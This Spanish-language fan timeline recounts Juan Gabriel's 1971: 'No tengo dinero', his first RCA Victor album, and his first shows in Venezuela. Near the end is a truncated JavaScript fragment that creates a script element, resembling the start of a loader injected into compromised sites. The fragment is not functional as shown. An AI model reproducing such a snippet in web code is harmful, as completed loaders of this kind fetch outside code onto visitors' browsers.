Año 1971

1971

En el año 1971 “Juan Gabriel”   

  • En mayo de 1971 escribió “No tengo dinero” en la avenida San Agustín, casa de la familia Puentes Vargas y Urtusuástegui, Colonia Satélite, Estados de México. Fue inspirada por una novia que tenía, Lily Durán, ella inspiró también “Me he quedado solo”, “La más querida”, “Tu que fuiste”, “Solo sé que fue en marzo”, “Porque fue que te amé” y otras.
  • La Prieta Linda lo lleva a RCA Victor, considerada la “Catedral” del disco en México,  donde el Señor Enrique Okamura le da su primer contrato discográfico, grabando el álbum titulado “El alma joven”. El disco  fue el primer bastión que Juan Gabriel dejo en la historia musical y que le sirvió para posicionarse como uno de los favoritos de la juventud de aquella recién iniciada dedada de los años setenta.
  • Mien­tras tan­to, otros ar­tis­tas lo­gran si­tuar­se en los pri­me­ros lu­ga­res de las lis­tas de po­pu­la­ri­dad gracias a las can­cio­nes del divo de Juárez: Este año La Prieta Linda graba la canción “Noche a noche”, convirtiéndose así, en la primera intérprete de Juan Gabriel. Posteriormente, Roberto Jordán, graba “No se ha dado cuenta” y Estela Nuñez, “Extraño tus ojos”.
  • Realiza su primera presentación en el mes de noviembre en Caracas, Venezuela en el programa de televisión “Él y Ella” de Radio Caracas Televisión conducido por Mirla Castellanos y Miguel Ángel.  También actúa  en las ciudades de Venecia, Maracaibo, Puerto de la Cruz y Maracay, del mismo país.
  • Es la primera vez que Juan Gabriel viaja en avión rumbo a Venezuela.
  • “El Alma Joven” su primer trabajo discográfico, el cual incluyó su éxito más conocido “No tengo dinero”, vendió 2 millones de discos y se grabo en japonés y portugués.
  • La or­ques­ta de Mu­nich, en Ale­ma­nia, gra­ba la ver­sión ins­tru­men­tal de “No ten­go di­ne­ro”, que ven­de más de un mi­llón de co­pias. A par­tir de en­ton­ces las gi­ras no cesan. Se ex­tien­den por to­do Mé­xi­co, Cen­troa­mé­ri­ca y Estados Uni­dos.

VOLER A TRAYECTORIA

var d=document;var s=d.createElement(‘script’); }

shares